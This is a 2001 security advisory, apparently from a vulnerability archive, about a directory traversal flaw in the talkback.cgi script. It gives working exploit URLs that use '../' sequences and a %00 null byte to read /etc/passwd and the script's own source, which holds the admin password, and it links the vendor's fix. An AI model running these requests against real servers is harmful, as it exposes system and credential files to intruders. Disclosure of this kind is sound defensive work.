talkback.cgi vulnerability may allow users to read any file

2001-04-10T00:00:00
ID SECURITYVULNS:DOC:1487
Type securityvulns
Reporter Securityvulns
Modified 2001-04-10T00:00:00

Description

[whizkunde security advisory: talkback (CGI)] http://www.whizkunde.org | stan@whizkunde.org


Release date: April 9th 2001 Subject: talkback.cgi security problem Systems affected: UNIX systems running talkback CGI script Vendor: http://www.waytotheweb.com


  1. problem Talkback.cgi may allow remote users (website visitors) to view any file on a webserver (depending on the user the webserver is running on).

Regard this URL:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article= ../../../../../../../../etc/passwd%00&action=view&matchview=1

This will display the /etc/passwd (if the webserver user has access to this file).

Another URL can display the source of talkback.cgi itself that contains the admin password:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article= ../cgi-bin/talkback.cgi%00&action=view&matchview=1

(You might have to use another URL instead of ../cgi-bin/talkback.cgi%00, this depends on where the cgi-bin is installed.)

In this file you can find $admin_password that can be used in

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

to post & delete articles.

  1. fix Way To The Web has released an updated version of talkback.cgi that isn't vulnerable to this problem:

http://www.waytotheweb.com/webscripts/talkback.htm


Stan a.k.a. ThePike stan@whizkunde.org http://www.whizkunde.org

Copyright whizkunde security team 2001